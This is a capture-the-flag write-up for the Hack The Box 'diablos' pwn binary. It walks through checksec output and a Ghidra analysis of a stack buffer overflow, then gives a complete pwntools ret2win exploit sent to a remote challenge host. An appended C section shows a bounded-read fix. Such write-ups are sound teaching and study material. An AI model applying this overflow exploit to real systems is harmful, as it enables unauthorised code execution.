This is a 32-bit binary that is not stripped, which makes reversing it easier since the function names are preserved. The binary has no protections enabled:
┌──(kali㉿kali)-[~/hackthebox/pwn/diablos]
└─$ file vuln
vuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=ab7f19bb67c16ae453d4959fba4e6841d930a6dd, for GNU/Linux 3.2.0, not stripped
┌──(kali㉿kali)-[~/hackthebox/pwn/diablos]
└─$ checksec --file=vuln
[*] '/home/kali/hackthebox/pwn/diablos/vuln'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
Let's open the binary in Ghidra.
We have three functions: main, vuln and flag.
The main function is not vulnerable, but the vuln function is clearly vulnerable to a buffer overflow (BOF) since it doesn't check the size of the input given by the user.
The flag function is the win function, but it takes parameters that are compared against hex values; if the comparison succeeds it prints the contents of flag.txt.
So we will overflow the buffer, overwrite EIP with the address of the flag function, and overwrite the flag function's parameters with the correct values. Since this is a 32-bit architecture, function arguments are passed on the stack above the return pointer.
Find Offset to EIP :
We can find it using gdb, or simply in Ghidra by calculating the distance between the return address and the vulnerable local variable.
So the offset is 188 (0xbc -> 188).
Exploit :
from pwn import *

# Set up pwntools for the correct architecture
exe = './vuln'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'debug'

#===========================================================
# EXPLOIT GOES HERE
#===========================================================

# io = process(exe)
io = remote('83.136.249.57', 47937)

offset = 188  # offset to EIP

payload = flat(
    offset * b'A',        # padding up to the saved EIP
    elf.functions.flag,   # overwrite EIP with the address of flag()
    0,                    # fake return address for flag()
    -0x21524111,          # param1 (0xdeadbeef as a signed 32-bit value)
    -0x3f212ff3           # param2 (0xc0ded00d as a signed 32-bit value)
)

io.sendline(payload)
io.interactive()
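The root cause the writeup points at is an unbounded read into a fixed stack buffer. As an added illustration (not the challenge's code), the vulnerable pattern is shown as a comment beside a bounded reader with a self-check that the bytes past the buffer stay untouched; the 180-byte buffer size is an assumption, since the page only gives the 188-byte offset to EIP.

```c
#include <stddef.h>
#include <string.h>

/* Buffer size is an assumption for illustration: the writeup only gives
 * the 188-byte distance from the local buffer to the saved EIP. */
#define BUF_SIZE 180

/* Vulnerable pattern the writeup describes (reconstructed, not the
 * challenge's source): an unbounded read into a stack buffer.
 *     char buffer[BUF_SIZE];
 *     gets(buffer);   // 188 bytes of input already reach the saved EIP */

/* Bounded replacement: copies at most cap-1 bytes of src into dst, stops
 * at a newline, and always NUL-terminates. Returns the bytes stored. */
size_t read_line_bounded(char *dst, size_t cap, const char *src, size_t src_len)
{
    size_t n = 0;
    if (cap == 0) return 0;
    while (n < cap - 1 && n < src_len && src[n] != '\n') {
        dst[n] = src[n];
        n++;
    }
    dst[n] = '\0';
    return n;
}

/* Self-check: copy src into a BUF_SIZE stack buffer guarded by a trailing
 * byte, and return the stored length, or -1 if the guard was clobbered. */
long copy_into_frame(const char *src, size_t src_len)
{
    struct { char buf[BUF_SIZE]; unsigned char guard; } frame;
    size_t stored;
    frame.guard = 0xEE;
    stored = read_line_bounded(frame.buf, sizeof frame.buf, src, src_len);
    if (frame.guard != 0xEE || frame.buf[stored] != '\0')
        return -1;
    return (long)stored;
}

/* Constructed oversized input: input_len bytes of 'A' (no newline), the
 * shape of the writeup's padding. Returns what copy_into_frame reports. */
long copy_padding(size_t input_len)
{
    char input[512];
    if (input_len >= sizeof input) return -1;
    memset(input, 'A', input_len);
    return copy_into_frame(input, input_len);
}
```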